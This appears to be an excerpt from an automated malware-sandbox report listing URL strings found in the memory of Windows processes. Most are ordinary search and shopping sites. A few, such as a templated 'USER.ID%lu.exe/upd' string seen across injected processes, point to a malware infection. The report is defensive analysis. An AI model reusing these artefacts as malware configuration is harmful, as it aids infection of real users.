Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001D.00000002.637761325.0000000004D1E000.00000004.00000001.sdmp, control.exe, 0000001E.00000003.563919283.000001C3E6640000.00000004.00000001.sdmp, RuntimeBroker.exe, 0000001F.00000002.627702451.000001E98B13E000.00000004.00000001.sdmp, rundll32.exe, 00000020.00000002.580157603.000001B5767DE000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000022.00000002.625989422.000001357695E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000025.00000002.627966819.00000257BF38E000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001D.00000002.638830121.0000000005840000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001D.00000000.544775772.0000000002280000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: msapplication.xml.13.dr String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001D.00000000.557748192.0000000007CC8000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RuntimeBroker.exe, 00000025.00000002.622923485.00000257BD042000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/favicon.ico
Source: RuntimeBroker.exe, 00000025.00000002.622923485.00000257BD042000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/site/autoit/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: msapplication.xml2.13.dr String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.559261545.000000000C236000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: msapplication.xml3.13.dr String found in binary or memory: http://www.live.com/
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001D.00000002.639175368.0000000005933000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
